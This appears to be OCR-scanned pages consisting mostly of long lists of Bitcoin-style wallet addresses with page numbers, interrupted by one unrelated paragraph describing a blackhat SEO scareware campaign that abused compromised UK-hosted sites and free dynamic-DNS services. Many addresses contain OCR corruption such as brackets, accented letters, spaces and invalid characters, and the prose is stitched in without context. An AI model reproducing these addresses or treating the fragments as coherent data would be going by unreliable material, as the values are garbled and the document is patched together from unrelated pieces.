1CweHaxHBhk7pt6VZd4XXXxHmQvN82hw5p 
1CxYYA5J7s5CkutPvg71CbB3h6DmwnZuUJX 
1Cxdg7gP5xDTxQBLiCc5fBXcGR19jontn8 
1CyVXuYspMrQhnR5a6kBNqDiIGONkeTBu6B 
1Cyitbt3Ppt4CRALWUJ13GVHG1JWA1CT3d 
1CyxZTMC5qqSDJK1LcNpfC7tapAGJd8N82 
1CZ9gROMLpX4FArjrZ2sFZKzWagj3uHH2Q 
1CZAoPu69ARjUPCgLMdjhSif6égpPFLIMrQp 
1CzYrgzHTnhWzwPFGg1vQ69nN3f1lsG8HhL 
1CznPqPvyYQjcJaciAcv7apMQvAN1D1fjGK 
1CznioSFRhSpcEfdFupglmsMgAqr8VXu5p 
1D2tMJPAXm1YUFUWoUAgg5hpjMvSz2LUvE 
1D3QtTaiJYfdcsrsii6pS9aK3pR5HaMSez 
1D4JueMc2DirPv7BW7yDzkXwCCNJj6T1U2 
1D4UFQ3Dwkec877ZS6fDUFDWKZSPwG9B35 
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1LD4cAWBdFtmR745mf9R58q8pf7QqAK8A8a 
1D4ce657giqgcwTJ]ggq4KCHLQ3WH2GKyDu 
1D5mpq9cTxxiciuMD832ur3jgxEv3qq5sb 
1D63Q3KPlaHsdjcRv6Rs8KAgRTour3WYkQ 
1D6EoF9HSpqrZ5HKHgaqZT1EGn3bjcofSj 
1D6f7ysxSiEGoX4EDRtfy68kQV9EFsolmP 
1D7VLNE9gYvoked5WxQNd6paQM2uPgmGkT 
1D7d1UJh5ZKvaQr1VJ4r5qkJ)VUyc6wCuFm 
1D8Ky7xDf3r3kbNVLobpkkaUgKaw8HgNwQ 
1D8Wp2RUjEMngLsKnyPrSYRmvAccumpvPz 
1D8aGW1q8Mo2zfAhs9YtnjF7RbrdcW5j8h 
1D92WwRxqPpA)Xoyxsa4ZRgq3nAJtXgYyF 
1D9LgSfbyJUMQD82xioyKmtioydd3XiEw1 
1D9S4CFikwF4dN1gCR4zmvwZAwuTqQv3Eq 
1D9scbz9jdfA3TwccA6JYnC9VNuThfDrbw 
1D9sx66HY1WG2j6MhyvdGndZAuuuFUoht2 
1LDANbYuex14NQ6DT2GrEPqbMaS2SdG5ZpG 
1DB4vYhKHpb2MSwJjECNY3mMGBMFXa3rB2h 
1DC8Fr68m7bYkGGjfa6khsaNdfmuWciSx9 
1DCKkbXHdjdrfEaec9H4VTZ6gFrcgEy9C6 
1DDPoA3rnXtHtp71v3KAtd53pdRTmskxrK 
1LDEhReD29D3ryWWTFobTvw4gAfxVK6d5dj 
1DF90L4NodeXrmaXAoe1MRGDgqJRCCy3i1j 
1DGABxWQELqkLFBDysaYZjBqub6hspgXTH 
1DGjVAiwBiceeXisBDmCytUywVCr1r8rXxe 
1LDGpGB2HWZhR72Qfoumv57MN7tRCuGn42H 
LDH46vQzSwW2aj2TdxntzzJwiZabrY1HkA 
1DHX73BcLgVo3Ls5CZ96AEWG5MJrJjPXch 
1LDHipDeA2u18JEBfoZTWHN4LhKR7B5t5ZV 
1DJLZ25xXJutHa93iIKUFh5dHefbqwX3v5Kp 
1DJPVnfaEHajUf6F42EwmGnVRNjUdp4D3L 
1DJTpA4mdBKKm9ZRHV6qWZYgGsi8RuffK2 
1LDKBdvEwkXkPmpe5KQTJ5TBGpD9UHZEckk 
1DKRnzGPswVpsF82Geo02EPZoxDkZsx9BZz 
LDLWygBQVAjjvYxW2Kx3xsrpim4xz37Wox 
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1DLdodqyc4TXHnxxMZxEJHvCcvW5T9Vu17 
LDMBSsLZr7hh3LQhZFjX15xPzSz4aXa5ZT 
LDMFLiu1CkYh2Ui53Fq1ld2CvjrxX2iPcrZG 
LDMNzi6RnyzSUgSSZJm2wXuJCP19YERFWE3 
LDN8UVgqgalpFsTZMW7v6HXZszfb62EDB8L 
LDNSKKoK4UkZeBYuL2FK6QfbJeYT8wQndo 
LDNpyokystrRNBe75rK2Gf8FZDhxDuB32x 
LDPWcEpXVmoQio1lNJN4xz423h8KQurXepu 
1DQGc1JQWMASub6KCSau7jbEodrWUkdWw8 
1DR5U971X7nsQCp6eHJhPcxXJGy5TJTqAeB 
LDRMtJnU2xs7a92RtCxHbu83iP3jNnMVK 
1DRSYFHQBCQusCwtszD5PYJBwjJcMLbnpdd 
1DS6a5MjH2YHaRBCP4K6XojpQs66M4Zbe4 
1DSLT5Gi4VCEV6b28gNjTi28B 7wVtKnqQu 
LDT4ACL58jtHRiISTWrGwPqfx6EU2KMWhjG 
LDTX9kG15nEcQAuQ6iAsutHCLDoihkaUFX 
1DUbCWgsUAa8GLi9ktbm]xWsnqubMtxmSi 
LDUjNYK4uuMiRTPphKE3MDS2DW2zGpjsSrj 
1DUvrP4u7NXDSuPW5y4cLe6QNCJUYUbDHLY 
1LDXBbJdNyLeqzzZMk87VnEREqgYELY1sbp 
1DZE9VcR5GcsubweLBSKdw2EpaHnjDaduV 
1DZd6nfnJCTy3g9HWaqYbgkePFPqtpd201k 
1DZpfAkZ8PEfyyzfr6ZYnxMGCrPeRYLzBf 
1Da8gfGQjwuZ6kFT Xu6CvuZb8rgJzprNTo 
1DafiMhx8cYwjZ3YmLqfJWTvhjLFqnuwng 
1DawVFwQ8EADFt6G93xTiL46N4UVSHhwxs 
LDbfATmEpt9CJHr6Zunjzsa3S7z54YoIsS 
1DcoswbrB6xyWUkGgocHXKxeHVmd35xYap 
1DdDzpy9VYvwGqTXZkqbb5fgHak6LT PbML 
1DeCwsdrQBzpCBTHGAMmJYNdtPNwiNy9X6 
1LDfPYALg3pFGJqeWzNujmazYhArbHqqqXj 
LDfFVHE48vpkEnVQNehPCYiDzTCDjP27FSd 
1DfiNUgQDwGpSEnEPiFze4LvDNhq49Eatv 
1DgExqdokE1s6LrqvMZkPmW2CaGUcPXmJ9 
1Dip1BUWcLFbpa4v6UVM 7stfiq9GrTztor 


25215 


1DjPvybEqNJkuW31Ph6jF5h5KvDvR2TP7X 
1DkGugnhiN3mtTxHzw4jJ9JZQoArJFSFbz 
1DmeJsKBH9ubsVgtMbEoZjoPHGoc97QWQD 
1DnNu4BdGpEoRGg6ZEQCbQz3QXzKp4wwgK 
1Dok4us60U054dL5tHYXPQoiUBbxxXtCvwY 
1LDpSRNh4xRnhgHseyLLQca7gHHMFQ8ifxY 
1DpihQ3es7XL8VGZGRQBTbREeDjJ9t6ezs 
1Dq49ak2WusahY7KVCPmL9YjFbpKAKBoRQ7 
1DrBDYLWDMPi3nbrHeVRQkiJ4wCMxoL6Yq 
1Ds34QTjtwLHqVuzPhydH1JBGxR9b5MkRR 
1DsJtxVtugCtnjj4XfpKSPHHrhVaiZbiyq 
1DtvuLeHv9pufGMvX1st5Rw82U4z3yZg3) 
1DtyvLb1pDzXVoaVnjJLAFzZBJN6b4gcJSdR 
1LDUAUNFNDsuWkB9JQPecbc5hmvVjZrfLbTh 
1LDUM6DTpAbj5uKUvoDi8VahNnH6eeTH31i 
1DusHrVjcQfDGYDDdNdEHiV44VdssTm4gV 
1DvcYWHe4JPpNVKNJGDz5HgFeUaaM1xD3B 
1DvxnGJ2eXZdgdktSN5EmZQN2E1RW4TXLj 
LDw9FBgPnrBGDZJ3i3W28yzNWJV3R8e1FX 
LDwpYpYMYNmZ7ewrQ2XgxnfS19C2ZCYpdH 
LDyoEt7vP57LxbSkEHP8uYqJC3tJCjxPCn 
1DZUkCcCHDWLEjzvkwUdVFHUNSFkwt3xtcx 
1DzqCjhWxsE19zZgEUH7zoxDxpJJPk3TmSU 
LE1znt30NE61nQxAJTEJuiGs7MHQxEegzv 
LE28VdMJWxibfV7R34EseJcqh7WVXF2ks3 
LE2T4HuizBkjjV2T1xBUkHg4mzGGq4ZRYv 
LE34BRIrVrWoENaqv8kxiRYzjjc7xsTFZE 
LE3xhsNTqkDPAMKSDWb19RQWxt6itc7CPB 
LE4Q3WQyG6Gw] pryGgp6TtZi3iQZirLUEH 
1E4heq1iBbTpRzhAVuwthUtcSKCEmGUWSvX 
LE5RVTV1SKYQGq7uPgRQFJSrzK14o0sFTuz 
1LE5Yuv9K6QfK4donofNLEtnBLPeEPCHGZA 
1LE5nzXPv3fuaasNHUCMmVknbbXsHEwNu3Q 
1LE7UL9DOYiyBKHMXMhGqLkbBMZNmvJsDJN 
LEQKHrgEsbxZkyLCBx75q4ZoHX5pRyrdzM 
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LEAxywVvagJDGKUHVZEMCSiv2BBQmFbVPu 
LEBHC8t4kHrnBgDqM2JHLseWZNzZwzWpHA 
1LEBp6rBBA9veexvnB1leQG9IDgQDbKYaBa4v 
LECjTYo9htgBxL4BWs9WxznXk506pqjhsD 
LEDQyWw94pf8ifG6v5y28GcB6MgqEephC6Q 
LEDzDoditL4CUuVcCvixHCvsn9rdFRuHvA 
LEEy6feCfDKegYsqLjZrri8BCGn43sYys 
LEFR6YYA9S73YFncZ2SqKR51uFRu4lLsgxXQ 
LEFZFM6vYMYS1tPBCan2eKg403S6nsAJdT 
LEG4gzWFycNfUeaPmnByBLoHR6Fv4bL7EM 
LEGLIBLyFHOb5ThPVPyP37qkkmh4JFDJVh 
LEH7JWaGEngjeVK1KjWPdDBzmH8TS2F2Hr 
1LEH98Dns7fpoSAoZ6wpqVvkLJVimzWyWz7z 
LEHY9w3KEeg1ErL)J8eEXBHx684C9awgQr 
1LEJwKo7QMtiohoDd8BxSRTxXDKMF3CxuhZb 
LELAQv2DQqApozVVzP4UhpNgAKFFRBAXLP 
LELQFxTqY31NPbvqwQ7XUp8xn6810kCFKD 
LELSWDhjSwv3avo7YyBRVtX3Goj1cj5yob 
LEMr6ErQeo34tg3TsvzVYtVSMgxfbmGSZB 
LEMy7DRhyozM4kt6F 89gzbfqf4bBM7f30a 
LEN4Wos1AUT6ZNUGEkKoN5RrSoWP4Y7gyto 
LEN5heWr1dhNATcPCrJZTVmFs5mpbjbT35 
LENAIs3hf9SZHuRnj48nfNaVwwgU2s30ST 
LENh6T3VvSVCV7LEQZRKCGVH3A51TfIs9mu 
LEPEGAcPc3MbEyu59imYrJEdogyEPWrLyYg 
LEPe7MwjM33voudD5gr3SAbjwW75WFwxpP 
LEQat7jdqnth1ljfRmMdHdFpdn8HDtza4Jw 
LEQiIMGLApzDdPYLWoDMyUo027q5ashMxdQ 
LEQkiI8QpCyvz8GJohHu1VDjxZfViKCW8Bs 
LEQq7tDMwrnb6ébf2jjZMy1B5WmH1q4nQQo 
LER5oNP9WMFY57LhatzFXAityEv6D7uTyz 
LERASQE2s1bj51shRSZdRPRGw2sgdWx86g 
LERMXWwoYnaf5F39pEaDEYSQe2qo5YfzNxX 
1LES24c4HmeExYXLLWbDHDZAjxSCYAPu1lm7 
LETCMZZmiba1CJG9CZpEmMP2Xfb6RiBra) 


25217 


LETeSrLHhPgQ4BPSmsq9iR4TmgH2M27SbD 
LEU26ntp5A846uXLz8E8mmfvic3mxy5mm5 
LEUPcug32vs9zbZL3KXquVZDaC5zdF5qaf 
LEURKxx58qizxmJobhHDkKPCzw9ueJ5jaoF1 
LEUwRfdWmMDaJFDEAjUqNFf54kZ2CtDBBj 
LEW7bXW69z8xw7yBBGH7FNhu7JTq5SSbFPN 
LEWxmpKbx8phfpBmvTNYiWwivNPULLX6xU 
LEXq2ucmwovxFbba/7ggwY28EBAcejLWS3f 
LEYFWyPoE7QvWRQnwkKgs3XfqtBeUw63TBn 
LEYWqRszBCsFGdjkNWhwf]b9RHUyhyYtXB 
LEZS6e8Dq8XmxVhM7w2xDduhvSiRkhp599 
1LEZxo5zLvefuESi8UsezPhMwMCw1FVZxmk 
LEaWqwxG5xhgX4u7d4DJV61spFFHwtxxkA 
1LEabUqmggz6koMyGE9zyin6MXuJgYYDLSS 
1EaoUEngq563QGDqQUfZX4dFmFL21zXPRIr 
LEbKzuxszECPsJYSZdZ8EcvP95ki6NWR2j 
LEbPtzPNQJNw13unxVnFJ2tz1LWrmNWe]1J 
1LEcecdbDYPbTYpf3tLd9bii4vNimkWCwtn 
LEchkbXWKmLUEXAZ3VJyfXxzf7aHrHm4qSk 
LEdDZgFHmP9QpmMmJKrnVb5FyyHuojDksLpi 
1Ee17n5xgPTbiQLKKooLXHhDiV1NfE6Y9i 
1LEeU6F57zzieVIRGC3T1651FrHGFTWLIMH 
1EefqecPLGVSMk1ligPyC5C3f7Bkt1j2tUu 
LEegn9qzTkyVgW7trirwchvtwWEszrfdrF 
LEemeAvvbEM6AXxDr7MN2UDUFRjrS6Wvya 
LEf14zdgAzS1JXLgAxQynh5PAD])j315Xe2 
LEfUavmGtoVrle4rT 7BgRDJUS5mzvHNo7sWw 
LEgGU3zVjlao8qVgMyGKiUKhTTFhNa4sFG 
LEgTjcEd4roSnZzeNJQ4E5sKNTCpRikfzE 
LEh5VSsJNAAZKCAkKSAF 4f4aLSxskcBL6bP 
LEhNC8YpJ4mkNEtvyYtP6zM9rjJasEFpVtWY 
LEhJaGXcMdVzBL1itHua4XN6Vwd8D4sm31F 
LEI62EvhQa4LHHg3TukgcMgzWj4kmUcmgV 
LEiqxE6aXaPVZTtQKnmt7jNobmP5AeQtmJD 
LEisTZVhjrXD5cKWXWYhJsA3SWG946RovX 
25218 


1LEjGiSg9QDXteLDDMHoiLWnPcmEUK1mEs3 
LE\JJK“EzwKwZwqziT 3BdLbVYEgCoj1Cc47C 
1LEk1coJUzs1GqSuWGfMgaueAURkK5z7VQAQ 
LEk2hmrn6ffNK3s7iinmbucmpQwgdWN2BZ 
LEkKG8uhnRLwp1C4TvsjUfQdQmhnrkE2jNe 
LEkYhxtFX4GgdXWSPQepsjFLgRehdYwiiB 
LEkaHJ27M5RQRkKbKNoCxWvfx1ReGgQEpBE 
LEkmkJe4hHFLtjSUUqV60QW3XeqSMshfZF 
1Em4ZbqenwtUmD1o03nhXvLU9Ky7skZx5M8 
LEmMGx3riin7x7wrtpdGdFE2rd4egJbzFcm 
LEMLLj8peW292ZR2VvumYPPa9wLcK4CPK1 
1EnkeeSSfdsbhs5b4EaPM3T2x8LwT2qdh8 
LEo5c6xXR2TdTA97z2r9KoiGVZavV3FSDd 
LEoVfVVYbk4Y1ss282SPjh3SGgA92TfjaZ 
LEogH4DuPG7J14kDLyoKCDHh4e4yFLROrE 
LEpy8AjuypY8teRCi6UOHLObxpbPHBB2fN 
LEqjyXX1iBqKuL6xpqyCVijqgJ/ENGeA7NGG 
LEr8UtELEUgQC21wwZHsDNxhURJB1ZCtuv 
LErW3qzKp49nrikmrwIcWT4t7KcDkKGagh 
LErgC6svPgdhDAhkuR9nr2Ri60Ak57TnYh 
1LEs5DzqalrPFuKLjh3QBaSb3prxiMFwUPh 
LEsWDdrJbUqdXabspntMsyHQax4JrirSaXx 
LEssdF7kmvjpfznebyQKzte84xSHAnMWWU 
LEt5spoELH8mD6K78FfL6SSdUa9jk4aiYm 
LEtYbnFUjoFDudjMZ75KgAkVkfhyX2bDLn 
LEUHog8QymHRYjHW7PgKLsCXfzgobxE4sM 
1EueRvvAoT2q8CSxehVKk7XjnbWcCgjwbp 
LEvfx9qk3BxrCZ5HncwjWY9uTyGFQKuJiG 
LEvuLivVMv608QNf6kEsPRWAjcseiWrExq 
LEwxVQhh4TgqHU3snTmwQKQfMjLVBYEjBq 
1LExD4vpSvsLBf5ZMpvEBSDkh9oLEP2njev 
LExTeAPPLjjGPsa29SAYfKMk532rLQX3Yo 
LExYXcdwsDd24TWUrA26KyjHC293VvM88aP 
LEyfeFpyJFrr5ahb56PJSmFRYajGFEhgeY 
1LEzxgmkseXmGoEKFLxMh]HtH4UWfLGJ7WX 


25219 


1F1tAaz5x1HUXrCNLbtMDqcw605GNn4xqx 
1LF229Evjh897thrp6jVaE8dhpq41WnGKTE 
1F2K3zxpjTWDL7aBt497cVqUJUG3G85rkE 
1LF2MakK3bVrjbHj4fezw4Hjo5vUMF9Btlm 
LF3MyX5rvlHMnprHjtRUYZYEqXk8nTiQbM 
1F4Cchxce7ZUp9kWV7KGcvBmv1FDxN4xyF 
1LF4FFy5Hi8d5U4m2NDJ2sSdAB3V85D4DAW 
1F53aiwT4Kii9hdhrdU1k1x65TKbSAVNHg 
LF5KNGV2XxLCpbusTftintbQ7ahhpQ1HoY 
LF5nZH6kK3jhtuvjV7GcJ6B8SWHjyNxVt4M 
1F6jiWLct4k2UsHkicuPYqPqenja6sSNpN 
1F7d6w4LnUkMzfUpvbsmaWxnxWRbbQGF1ly 
LFOMWVALHYaU5xs5Xz2CqSsYMbxaTU5RHa 
1F9P9JBrogB8Rtfxe4MfqyhzQrW7GXagMK 
1F9t4jcoJqPgPxuwUWxRaqJZDsJ5349zYcD 
LFAQbJdkyw1c5EbrsfpxP4gCNh]J4jUigxs 
1FAB6uvKD9g5MnGm3talERvmeVpYgyNQwj 
1LFAfnyV7eZthyccpvoj2jnGtjPaG4hCUDj 
1FAtmpz7C7R4xHFy2MRcRMpKKTBjJtVuuM6 
1FB1H66TBB7tQhYWo4fcRLaUHDVCGXpZxh 
LFBntjxnspjJ3LUHSzoyoPuy3M66W4z3KS 
LFC5A7WZgpTipqw2CMoBnqzveT5vLjexz6 
1LFCVZ9z3dVZywPn9vEk6WSixPo5FCdG2Wd 
1FDRNXi8DqFSvH9nfrdxMrMWvtareDDRJ3 
LFG1EnL7v9ho46CUNaRDnvyWR9ObWuZCSPY 
1FG4mH5zsq6aPWJuioDTBuSePXRYAWHkK27 
1FGrWhAFLe6HbSG3evte9LrUgUCtYheQ84 
1FHg6BkVVMUEHTajiyXbFjE1cCvDHUnjfB 
LFHmjDPyr1WMtHfzrNZUNygzZCqWCF5CrQ 
1LFHsps7G5P6SAKB2ZW1s7gG1UnWh8VvrwY 
1FKDntxelPk3Zk2rgcMGbMNXQLpXy2SLAG 
LFKNYpiltokPhYvV2teeLdzSFvzS8dUJZ7 
LFKQJEKHfjoMF8qoHAo61JY5xJBJ6ii3i3 
LFLSNsqpth789gjNHyPNF12n/7tfda76XXs 
LFLK1Et3Lko44CKAiQwfcy3vb5vNWWwAx] 
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1FMaHed9MuC8vQNVMmE6RTYvctNLahVjA80Z 
LFMxx9VWRpfdwevADmjjjubx53yT9ToyYi 
LFN6WgbksDnhvwQJryZoddpcrmpkKYh2XNN 
LFPLAMNcUkKExvCjEmDCyMjhgZcGG8ZxJrG 
LFPxiMt5hUf66ktjHFCsN3eCvf21zD1bX1 
1FQG7XtaQVTBBNPxwsRfBZDVv7jk8xPntm 
LFQHSHjziRS2fGUNbbyfh9JY¥n2F2VHYwQZ 
1FQXahiaDY4ksRW7h9rnmURTMXPgkZe12D 
LFRNPxHfrVfHpREUfu8jjT814PLrTHEZFr 
1LFRPwqpbSN4ajhgPLRbGQZr1j8QP195Hzx 
1FS4RJdmwjX4BjX5WugHe8pKFWRSueeES7 
LFUEYosFFP9X93yrPzeW5YQpbtpg8eq5Gd 
1FV1Irv8GLKqJQWC2pqCK8PyQ7RWWBNVLI1f 
1LFVzSQzrVBSFZ4PdcG1BycPcQcPU7L9ai5 
1FX7Zh2uztVGKhALhwW6YKx2b8aQCtDpnZL 
1FXRGhsCuo3zmCURKHHWVBKVwcR7itWmRk 
1LFXZ4RSLrYAy6UAfBZXqcxf8rxpZbfGTmP 
LFYGqY1bQaHFWSj7)JponQDQCW2)fxgwVM39 
LFYWoVcnR87j5pP2U5ETqURzrAl19cgoh]1J 
1LFYnrdYPWN5FmLgBheinoFciMjuQHEkJHB 
1LFYw38sZ2V7pe3pNqsmkyYfdSHdETcv6wBi 
1FaCBShSsJNDeUqVEjWsVS1AiW36YHwCdn 
1FabXwNEsTnsob9RpGm5UAyRnop3YsyZHP 
1FbGEpVzFPR5d49d6wccMGcZyxU63H5roL 
1FbSCdRuvzMgQ7gqGWtrenRCWL7ZKrx2oh 
1LFbqE37UytGHonFoCv9nr5Ai9aW2sPhjvo 
1Fcp3uX3E5w6Q6JGFeTTDKok2E1xteKN38 
1FdB38DrTuUUVSvJPJE2Yik8YWRWrJF85mH 
LFdUffsM2bSZiMtS2kFp8J7Dj8)tVu4 fk) 
1FdZL34D4EZYV8RCHywckJM4RX4uLF5ATH 
1LFdk3NxoLx428ynJMB6XVRTZcRfXGiiIGXG 
1FeBLqQgQ19FyEwwW8vHav3jufS4goTZ9P 
1FeomaxPLtBMJAp4tnZfFXSdkjBvfdsT6M 
1Fez2DwG5vudNJXXFtwBF23wQE9tVepCt 
1FfUeEUBM4VBxjRZX8QbU6xc6xHQbZuA1fV 
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1LFfqUg2EG6iLHZaCAfrb9iWbMWafPb7A5e 
1Fg8LgZP9hVLMKQxDLDmBB7Yfz47NKq2GY 
LFgQonAviu6Wt1XjdgUwoNGHmCEFNaDKEs 
LFidRWrCh3jNKUaBSKDf2mQghLXvVRfe9 
1LFjqeSC5fZnQPHsLumtHoRPccK5bWefxeA 
1Fk7g21RwwSNePrD1W)4cjB9xy8GqifzSN 
1LFnTTppFXFEpC6JQfxSs1lcdGnENVAVUCVK 
1Fom8GLdBzZL9dMTipd98AWHMRvZ42pYqi 
1FowmtfFWGGe7ZZAuSz59eGVXQKpVdvFd3 
1Fp654HhJp71pCwis4M))JXDeBpzTSehYEW 
LFpRUSgfbAVT5nbqmYy37gi6bJyBZuaPKB 
1LFqDBiWHyDfwtiHdzzKhiDXvtV5ZyPkVpf 
LFqyVVBP2Vjqnsp7NtEgaG6SuiEymBc1Q1 
LFrKZC4EQLYXLMiJcTNCZP4gGWTMVCr6ah 
1LFrRtGo5Z2eWPe91Z9MLpDCwkXw7MbgeiD 
LFrSF471ryvBj9a83QhTuUs2jeBNBgin6r 
1FrrQ67wcpDLisYaGshw54f2veHDzZZTTQe 
1Fs6FYboyNLTLDyTR8NVK9bXwoM85Zb1Gd 
LFsMHgJTD9px9JgcTa8iuFfifH4bYHW3rU 
1Fsu8jv8M8MoRPUEr6yAyagz3i3inW1Qcz 
LFtShPBfTf6GMU6bTOZk8J8ASREbZm2Ah5 
LFttUPVxXeN1LUBcbZtK67fdjKb92fyywVh 
1FufAPJgs53eH3qaBFz6y2b2TA7HFAQAoV 
1LFw7VwKo2uBJmMUEHmTvzqEvjZoQCaa9y1k 
LFw9GY5bfJSKgrjW9Gn8NcNpVyLUNL7Pu9 
1Fwsk3b6VM5Soj2YdhyKkgbpnm9RBNLttE 
LFyw7LJM3HDyccHWFpPXjjncrTluLE2YnVG 
1G1Hkmd8oi4EAS7TgqdSSFtNoEWDA6Ww55 
1G1LFYxndaec7b1EHkzwmgVowDSDGL2XM2 
1G1WJkRHY2KvsTUJBqa6HGksnxaF9qxmLE 
1G1d2b16V3U1LeZecf6EniRbrwkFnWL8Kk 
1Gl1grYvjHeGUxKM8V3araun337BXHhERFN 
1G39J1sN6BuCKMRDydduuSKBgyAsysqfog 
1G3J37YZTmMUXeAQIQHqURImBnYvuzDsaea 
1G3KUg2PFtEgrGvQLyyho8jVwpjbTVnLBF 
25222 


ma) everyors rer 


How did the cybercriminals respond? By proving that this blackhat SEO campaign has been 
well planed and coordinate a long time before it was executed in the wild. For the time being, 
it relies on a combination of legitimate U.K based sites, the result of a evident compromise 
of [3]Web Hosting Mania due to the fact that all the affected legitimate sites are hosted 
there, a growing portfolio of .cc tld domains, automatic abuse of free services such as myftp- 
site.net; dns2go.com; dynodns.net; thebbs.org, and systematic pushing of new scareware 
variants/redirector and scareware domains, which explains the low generic detection rate of 
all the samples obtained. 


Moreover, not only did the blackhat SEO themes expanding in the typical randomly generated 
junk that has naturally been crawled by public search engines, but also, according to publicly 
obtainable statistics, millions of users (collectively) have already visited the landing sites, with 
42.80 % of the referring site for a particular domain coming from thebbs.org and 31.97 % 
from Google - their tactics are actively hijacking millions of users already. 


2525 


1G3Tmhi5bNmaAYwfNQPpuHEyr14Qa57UmU 
1G4Eg3WiP5xloHe2mZYT3MD1lyaDg2DQW3A 
1G4Tt1MLdFqUgRMXkCZJUY866S9nusSd9K 
1G5VVnU526671sX47tMXkAQQon2Lu2NJUf 
1G5d2BYZZrPYcoAh64gNMfFgCGf4iiejMy 
1G7jPEKTJ81KoDtF3PPgCpAyoez83HEBMu 
1G7tyjdwMfD3VJdkfhy6fkd1NxYP3HEmJm 
1G8KQtJdkRcR6TSEQMaCQR5dGEcm7SVJRz 
1G8XuZBAf626dg96qkKNnVLmHt1lUs6SwWcq 
1G96F 7jT18ZkXjS8W6GwnDHvQLQKgtLCL4 
1G9dcLbcD6w3j5g4hJDEBBMUup8dxmGQVa 
1LGAW46A1vdfduA99WRd75PzJ8K9jSFhkys 
1GAw9JZrngZcnx7AYBAB7ApZutUfcTNgcR 
1GCuFCtz9UR89UFbLLnt3nWmSk1lqzvFDRQ 
1GDWhtsUxeZNtqveNARJ4cLBMp78RNBA3H 
1GFBdzacpWhjqFBXxcL4g1VNz15fSLaU9r 
1GFWhgjayHCkCgQqPsaV LHEgk7GP3sjCUh 
1GFgyqqavLPaf62zq7kQtyMpjm8MeyfjBx 
1GGwpYMDCSfiEuKRaWSUXsSTpf517GpP3i 
1GHhF6ab2BF5Hvevfxtid4NFRLtCQDJxuX 
1GHtfoycU9tUWKHa76a5rnbq9bFDZWMsf6 
1GJBPnEV6sTtND30Q66Rtxcn8PmJN2hzcV 
1GJJ3DFD3Wak8jT8F7qRPqqcVfWxMWbhPA 
1GKBozXS2nq658XGHYMw6QGHKEGCDhnn4P 
1GKhq731VQyz9Ez2gq8SFk5qJInjAMbLYA 
1GKjZc2Z2wHCXd4L9OTEcFVYnfNoEgcyKMRS 
1GL7c9JU4ys12xXtpPAQsRW2ufrkyszKXB 
1GNBud55zi3PZGnXpCMQEXKTYdp6édqelsS 
LGNWBbHgPs3wSHN7z1mR9JdNu9zZcZBMBK 
1GNZVMxQxtvM4zqSorECWSZHgXNRRXSiYk 
1GPaBjDvaE3izkkVckenuUkqFt791UWmpR 
1GPeFBtf2mNep1QnTGsxXfaWig5DLZnLFse 
1GQrKXwqYBEe491VyQgjB98Jw3o0MfLnJVQ 
1GRs7cyMsbTh3wdngBu9dACyHd1NS6T35U 
1GShQhaTPjrTHWkKDJG8dncjPkfWxv5cC5P 


25223 


1GSKkkYQiRf2QvS59cphT5nFQxyx8jhDZLR 
1GTFnsm5atXAKjNY2TttqF 5WATZoxXC3je 
1GTgw730CxN6Nf2D8DrVYdvN6jas7VVITG 
LGUNTJtzQrz3gM6p8pY3puYgWKdAa2sqyA 
1GUYqSbaHSsVSCXLGhFHv5f76H1s9znhjd 
1GUbSnANCQF2RKqzEV5T61Z01EJWowAciH 
1GV9AGCVKMAYBvmYyUbw5UB1XVqsbmYXSZ 
1GVDd4FzyTWkMD5LZ3wGfqrrRxMMk6mpSx 
1GVE3EhYo9uzYQ8AutB6qSH87m7jiZGe6h 
1GVQk3zJDuG7USQKSBJ81R1x4fkbTLGTGL 
1GWQv1iLmYCVk6cKikarV2hC6RJBULZ26am 
1GXUGJBFEtaabBABmPtUrH1k6E3NHZM3Dt 
1GXXpLkGKv8d4XmD9zrWm8uvKKzVamSyYC 
1LGYCQrYVK3puuQJa5eVoi7rcHETb3XtwRn 
1GYU8VCuB3Umkvmz4qXinKKTYqhsTkKNEot 
1GZBz2kFBYs2ZTzu8VZpHyfdNiniJoZT4q1 
1Ga5LFMYz983igRWSNbLcBQ9EWg4uPTaCz 
1GbLR8TJDaxXq2FZf5EcNiLWVtnMhXRdkLi 
LGbbEYHri53ZahtCkZax4gvCV99LKwtR2u 
1GcKpw8F5YgXe7f2a9QM4cEvT6TZNDxKsa 
1GcfSQBrSWRmofuwleSA2KKd8bwSa3]bEq 
1GchdSyPAaLWdC2LYZtR5RD6aueqrCqAKT 
1Gd7kGqbaAhmre30McDPUNLLVctsL6gjgF 
1GdyuJ5cJ9xXUXPUynATFa3nGWfu5L5geNn 
1GeRxv50VmSgtNw8aAd7MvDvimLpPy9uTT 
1Gehkhrk8cCwUESGGs]Jw2KLEwzt689BvLd 
1GfQ4D2bfQSs6cfLhgLgAlg4js1K6iKrFv 
1GgaA6C5KwwnWhcd5heBSq8bpv3zRHWrYjx 
1GhLKm2YeA4bEvUYwn6rBbh39NcdiMwmne 
1GhbWGZjbiWKfvwUn3RR3Hhs7cuPn5s3nh 
1GinrABK4MQS2hsCXSHeiUJVsziQpv6EBx 
1GjFauJFVTQf8sqfé TrcFjr7 3fSsUfeePL 
1GjJjngdrLSAAQS6bWEiAgafxV90b7euNv 
1Gjc4X09QxaYugm9jFIGJHY22HVCBprBjE 
1GkAFg8ipQ4VYNuonvoEzabsLtwHE]J9wcP 
25224 


1GkBo7k4b1k7ehPYYqiY9jhGXPNCKtyEGi 


1GkVMDo8TqDxww8DgPS44D7W9HqQcHP1Q9 


1GmPpRp6UoLp5LuFtJScBiLY37An8d6jxXW 
1GmMZNwinQpPAX6eYCVEWYt71qVdEJbP52H 
LGnHDEHVQZfwYEepCHKNLyZH65rsAfpPqv 
1GnXDQ2vkCCkyYSSmvKRQRUuVngczgaPP2 
1Gnf167AnJfdBZYw8shGHEnHVWxHDSUv1H 
1GoKwzhUgBNj8JnbZFnjJz6YjHLaDsBizy] 
1Gp3nyE1LWVxzxX4vholap48Y8o0whyAxVio2 
1GpoWMVaNZb9xok5kG6Bbk3s7xsTaCM437 
1Gps2NtpxJGMeTXjHRaDtjkGWZRAVirtrQ 
1Gqh6mMuUVERCNE3B3YQ6L5hTLQWQNJvRue] 
1GqvXoBHJRcAPt3RgFQzV5ZtYdm3kBsQ5s 
1GrJRhpS49N3M7gvGvrHZfn5E66fx8XM8p 
1GrQeEyhP2jxKGPgeqoLV252x6XShD8G3W 
1Gs1fu6K84s2udr8Xz89PB5zYmHGndVoEx 
1GsM8qnoesqncTw5 1AnQtAGS6DHgQEaxgE 
1GtCe2nDYQNNsCkKtcdrasNpETe78KYgnCK 
1GusLDqkL1ShHDgSyRGPsKS7haGogxCYRU 
